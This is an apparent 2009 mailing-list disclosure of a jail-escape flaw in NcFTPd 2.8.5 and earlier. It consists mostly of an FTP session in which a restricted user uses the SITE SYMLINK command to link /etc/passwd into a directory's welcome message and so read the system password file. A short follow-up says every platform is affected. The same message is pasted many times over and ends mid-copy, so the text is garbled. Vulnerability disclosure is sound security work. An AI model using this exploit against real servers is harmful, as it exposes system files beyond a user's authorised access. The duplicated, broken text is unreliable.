> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
